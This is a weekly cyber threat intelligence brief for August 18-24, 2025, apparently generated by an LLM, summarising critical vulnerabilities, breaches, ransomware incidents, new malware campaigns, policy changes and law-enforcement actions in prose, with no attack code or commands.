Cyber OSINT Overview, Aug 18 - Aug 24, 2025 #

This brief consolidates key updates from 80+ sources, including government organizations, cybersecurity vendors, threat intelligence teams, security research labs, and blogs from cybersecurity communities and professionals. It highlights the most significant threats, vulnerabilities, and developments from the past week to keep you informed.

Most Discussed Topics #

• Multiple vulnerabilities in the Linux Kernel were a primary focus, with numerous advisories detailing flaws that could lead to denial of service, privilege escalation, file manipulation, and other unspecified attacks. These vulnerabilities affected various distributions, including Red Hat Enterprise Linux and Ubuntu. System administrators are urged to review and apply the latest kernel updates to mitigate these widespread risks.

• Phishing and social engineering tactics are evolving with increased sophistication, heavily leveraging AI and impersonation. Attackers are using generative AI to create convincing phishing sites and emails, including HR-impersonation campaigns with high click-through rates. Advanced techniques like ‘quishing’ (QR code phishing) with split or nested codes are being used to bypass security filters, while other campaigns use fake copyright infringement notices and homoglyph URLs to deceive victims.

• Vulnerabilities in widely-used web browsers and related components continue to be a major concern, with multiple security advisories released for Google Chrome, Microsoft Edge, and Mozilla Firefox. These flaws could allow a remote attacker to execute arbitrary code, bypass security measures, or cause a denial-of-service condition. The consistent stream of patches highlights the ongoing need for timely browser updates to protect against web-based threats.

• The use of generative AI in cyber attacks and defense is a rapidly growing area of concern and innovation. Threat actors are leveraging AI to create more sophisticated phishing campaigns, generate malware, and automate attacks at scale. Simultaneously, defenders are exploring AI for threat detection, AIOps, and security automation, though research shows these systems can be subverted through poisoned input data. This dual-use nature of AI makes it a critical topic, with a focus on securing AI systems themselves and defending against AI-powered threats.

Critical Vulnerabilities #

• Apple has patched an actively exploited zero-day vulnerability, CVE-2025-43300, across iOS, iPadOS, and macOS. This out-of-bounds write flaw in the ImageIO framework allows for memory corruption and potential code execution when processing a malicious image, requiring no user interaction. CISA has added the vulnerability to its KEV catalog, and Apple reports it may have been used in sophisticated, targeted attacks, underscoring the urgency for all users to apply the latest security updates immediately.

• Multiple critical vulnerabilities in on-premises Microsoft SharePoint Server are being actively exploited, allowing for remote code execution. The vulnerabilities (CVE-2025-53770, CVE-2025-53771, CVE-2025-49712) stem from the deserialization of untrusted data and are reportedly being exploited in Canada. Microsoft has released emergency patches for SharePoint Server Subscription Edition, 2019, and 2016, and organizations are strongly urged to apply them and search for provided indicators of compromise.

• Trend Micro’s enterprise endpoint security products, including Apex One, are affected by actively exploited OS command injection vulnerabilities (CVE-2025-54948, CVE-2025-54987). These flaws allow a remote, unauthenticated attacker to execute arbitrary code. CISA has added CVE-2025-54948 to its KEV catalog due to confirmed exploitation in the wild. Trend Micro has released a Fixtool and a Critical Patch, and all customers with on-premise Apex One 2019 SP1 should apply the updates immediately.

• Multiple vulnerabilities have been discovered in Commvault Backup & Recovery software, with proof-of-concept exploits available for several. The flaws include argument injection (CVE-2025-57788), path traversal (CVE-2025-57789), unauthorized API access (CVE-2025-57790), and a weakness in the initial login process (CVE-2025-57791). Successful exploitation could lead to privilege escalation, remote code execution, and unauthorized access. Administrators should apply the necessary updates provided by Commvault to mitigate these high-impact risks.

• Cisco has released patches for multiple products, including a critical remote code execution vulnerability (CVE-2025-20265) in the Secure Firewall Management Center (FMC). This flaw allows an unauthenticated, remote attacker to inject arbitrary shell commands during RADIUS authentication. Other advisories address information disclosure in Evolved Programmable Network Manager (EPNM) and Prime Infrastructure, and an arbitrary file upload vulnerability in the Identity Services Engine (ISE).

• A critical vulnerability in ProFTPD could allow a remote, unauthenticated attacker to execute arbitrary code with administrator privileges. This flaw poses a significant risk to servers running the popular FTP server software. Administrators are urged to monitor for patches and apply them as soon as they become available to prevent potential full system compromise.

• Multiple vulnerabilities have been reported across a wide range of Industrial Control Systems (ICS) from vendors like Siemens, Mitsubishi Electric, and FUJIFILM. These flaws could lead to privilege escalation, denial of service, or unauthorized access to sensitive information in critical infrastructure sectors. CISA has released several advisories detailing the affected products, including Siemens Desigo CC, Mendix SAML Module, Mitsubishi MELSEC iQ-F Series, and FUJIFILM Synapse Mobility, and urges organizations to apply patches and mitigations.

Major Incidents #

• Electronics manufacturer Data I/O has reported a ransomware attack that began on August 16, causing significant disruptions to its operational systems for shipping, manufacturing, and production. The company, which supplies major tech and automotive firms including Tesla and Google, has filed a report with the U.S. SEC, stating the incident is likely to have a material impact on its financial condition. An investigation is underway to determine the extent of potential data exfiltration.

• UK telecom provider Colt Technology Services confirmed a cyberattack that caused multi-day outages of its online portals and voice platforms. The WarLock ransomware group has claimed responsibility for the incident, offering to sell one million stolen documents for $200,000. The compromised data allegedly includes sensitive financial, employee, and customer information. Researchers suggest the attackers may have gained entry by exploiting the actively targeted Microsoft SharePoint vulnerability, CVE-2025-53770.

• An unprotected and misconfigured database belonging to Ohio Medical Alliance, which operates as Ohio Marijuana Card, has exposed nearly one million records of medical marijuana patients. The 323 GB database contained highly sensitive PII, including names, Social Security numbers, driver’s license images, and detailed medical files with conditions like PTSD. The data was accessible without a password, but it is currently unknown how long it was exposed or if it was accessed by malicious actors.

• The Canadian House of Commons experienced a data breach resulting from a vulnerability in Microsoft software. The incident led to unauthorized access to a database containing employee names, office locations, email addresses, and information about government-managed computers and mobile devices. The extent of the breach and the specific vulnerability exploited have not been fully disclosed.

• Russian state-sponsored hackers have reportedly seized control of a Norwegian dam’s floodgate, allowing water to flow unnoticed for four hours. The attack, which occurred in April, is now being attributed to Russia by Norway’s intelligence service. This incident highlights the significant physical risks posed by cyberattacks targeting critical industrial control systems (ICS).

Emerging Threats #

• A new RAT named GodRAT, based on the Gh0st RAT codebase, is being used to target financial firms. Attackers deliver the malware via malicious screensaver files sent through Skype, using steganography to hide shellcode within image files. GodRAT supports plugins, which have been used to deploy file managers and password stealers. The malware is considered an evolution of the AwesomePuppet RAT, previously linked to the Winnti APT group.

• The China-affiliated espionage group Silk Typhoon (also known as Murky Panda) has significantly increased its activity, targeting organizations in North America. The group is exploiting both n-day and zero-day vulnerabilities in products like Citrix NetScaler for initial access. A notable tactic is the compromise of cloud solution providers to gain trusted access to downstream customer environments, a sophisticated supply chain attack vector that allows for prolonged, stealthy access.

• A novel clickjacking attack technique is capable of stealing credentials and other sensitive data from popular browser extension-based password managers like 1Password and LastPass. The attack uses malicious code to manipulate a website’s DOM, creating an invisible overlay of the password manager’s autofill interface on top of a seemingly harmless element. When a user clicks the decoy element, they unknowingly trigger the password manager to fill in and expose their credentials, credit card data, or passkeys.

• The PipeMagic backdoor has resurfaced with enhanced capabilities, now leveraging a zero-day vulnerability (CVE-2025-29824) in the Windows Common Log File System (CLFS) for privilege escalation. Initially seen in a 2022 RansomExx campaign, new attacks in 2025 target organizations in Brazil and the Middle East. The malware, delivered via a fake ChatGPT client, functions as both a full backdoor and a network gateway, highlighting its continued evolution and use by sophisticated threat actors.

• A malvertising campaign by the COOKIE SPIDER group is distributing SHAMOS, a new variant of the AMOS macOS infostealer. Attackers purchase ads that lead to fake help sites, which instruct users to run a malicious one-line command in the Terminal, bypassing Gatekeeper protections. SHAMOS is designed to steal sensitive data, including Keychain contents, browser credentials, and cryptocurrency wallets, and can also deploy additional payloads like a fake Ledger Live app.

• The Noodlophile Stealer campaign has evolved to use highly targeted spear-phishing emails that impersonate copyright infringement notices, primarily targeting enterprises with a significant Facebook presence. These emails contain specific details like Facebook Page IDs to appear legitimate, luring recipients into clicking malicious links. The campaign now uses legitimate applications vulnerable to DLL side-loading to deliver the enhanced stealer, demonstrating more sophisticated delivery and evasion tactics.

• A Russian state-sponsored group known as Static Tundra (part of Energetic Bear) has been compromising network devices for over a decade, recently exploiting a seven-year-old Cisco vulnerability (CVE-2018-0171) in Cisco Smart Install software. The campaign targets unpatched or end-of-life devices in critical infrastructure sectors across North America, Asia, Africa, and Europe to establish long-term persistence and conduct espionage. The FBI and Cisco Talos have issued warnings, urging organizations to patch the flaw or disable the vulnerable feature.

Regulatory and Policy Updates #

• CISA has released updated guidance for the Minimum Elements for a Software Bill of Materials (SBOM) and is seeking public comment until October 3, 2025. This update builds on the 2021 NTIA guidelines and aims to reflect advancements in tooling and implementation. The revised guidance focuses on refining data fields, improving automation support, and standardizing operational practices to make SBOMs more scalable, interoperable, and effective for managing software supply chain risks.

• The U.S. Federal Trade Commission (FTC) has warned American tech companies that complying with foreign laws that weaken encryption or censor speech, such as the EU’s Digital Services Act or the UK’s Online Safety Act, could violate U.S. law. FTC Chair Andrew Ferguson stated that censoring Americans to appease foreign governments could be considered an unfair or deceptive practice under the FTC Act. This move signals a potential conflict between U.S. free speech principles and stricter content moderation and surveillance requirements being enacted abroad.

• A bipartisan bill, the Cybersecurity Hiring Modernization Act, has been introduced in the U.S. House of Representatives to prioritize skills-based hiring over educational degrees for federal cybersecurity jobs. The legislation aims to address the federal cyber workforce shortage by removing potentially outdated degree requirements, thereby broadening the pool of qualified applicants. If passed, the Office of Personnel Management (OPM) would be required to publish changes to qualification requirements and report on the educational backgrounds of new hires.

• The French government will mandate the use of Tchap, its secure instant messaging application, for all public sector communications starting September 1st. This directive aims to enhance the security of information shared within government agencies by moving away from less secure, commercial messaging platforms. The widespread deployment of Tchap is intended to protect official conversations and data from potential interception or compromise.

Security Operations #

• The UK’s National Cyber Security Centre (NCSC) has released version 4.0 of its Cyber Assessment Framework (CAF). The updated framework is designed to help operators of essential services and critical national infrastructure improve their cyber resilience against increasing threats. Key changes in CAF v4.0 include new sections on understanding attacker methods, ensuring software supply chain security, enhancing security monitoring and threat hunting, and improved coverage of AI-related cyber risks.

• A quiet method for enumerating AWS resources using the Resource Explorer service was identified by security researchers, as the ‘ListResources’ API call was not logged in CloudTrail by default. This created a visibility gap that could allow attackers to perform reconnaissance without triggering standard alerts. After being notified, AWS reclassified the API call as a management event, ensuring it is now logged by default and providing security teams with the necessary visibility to detect this activity.

• U.S. government agencies including CISA, DARPA, and the NSA are calling for collaboration with software analysis experts to shape research priorities and address the national gap in software understanding. This initiative aims to maintain a sustained focus on improving tools and methods for analyzing software to identify vulnerabilities and mitigate risks. The effort highlights a high-level strategic push to strengthen the software supply chain and national cybersecurity posture through focused research and development.

• The automotive industry is increasing its focus on software supply chain security, particularly with the proliferation of AI in connected vehicles. The Automotive ISAC (Auto-ISAC) has partnered with Manifest and FESCARO to advance vehicle cybersecurity. This collaboration emphasizes the need for managing AI dependencies, automating Software Bill of Materials (SBOM) workflows, and complying with global regulations like UNECE R155 and the European Cyber Resilience Act (CRA).

Wins #

• An Interpol-led crackdown, ‘Operation Serengeti 2.0,’ has dismantled extensive cybercrime and fraud networks across Africa. The three-month operation resulted in the arrest of over 1,200 suspects, the recovery of nearly $97.4 million, and the disruption of over 11,400 malicious infrastructures. Key successes include shutting down illegal cryptocurrency mining centers in Angola and breaking up a massive investment fraud scheme in Zambia, highlighting a major international law enforcement victory against organized cybercrime.

• A core member of the notorious Scattered Spider cybercrime group, Noah Michael Urban, has been sentenced to 10 years in federal prison. The 20-year-old pleaded guilty to wire fraud and identity theft charges related to SIM-swapping attacks that stole over $800,000 in cryptocurrency and phishing campaigns that compromised more than 130 major companies. This conviction marks a significant win for law enforcement in dismantling a prolific and highly effective cybercrime operation known for its social engineering prowess.

• U.S. authorities have successfully disrupted the ‘Rapper Bot’ DDoS botnet, one of the most powerful on record, and charged its alleged lead developer and administrator. The botnet, which infected tens of thousands of IoT devices, was capable of launching attacks exceeding 6 terabits per second and was used in over 370,000 attacks against victims in 80 countries. After serving a warrant, the operator terminated the botnet’s attack capabilities and transferred administrative control to law enforcement.

• A Chinese national, Davis Lu, has been sentenced to four years in prison for intentionally sabotaging his employer’s computer systems. After his role was reduced, Lu wrote and deployed malicious code that caused system crashes and installed a ‘kill switch’ to lock users out if his credentials were disabled. The kill switch was activated when he was terminated, impacting thousands of users globally and resulting in significant financial losses for the Ohio-based company.

Disclaimer #

The summaries in this brief are generated autonomously by a LLM based on provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.

The brief is created in collaboration with BlackStork and is based on a free template.

Reach out if you have questions or suggestions.